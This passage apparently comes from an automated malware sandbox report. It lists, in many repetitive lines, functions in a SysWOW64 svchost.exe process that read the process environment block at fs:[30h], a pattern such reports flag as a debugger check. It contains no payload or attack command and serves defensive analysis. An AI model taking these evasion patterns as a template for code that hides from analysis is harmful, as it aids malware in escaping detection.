            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
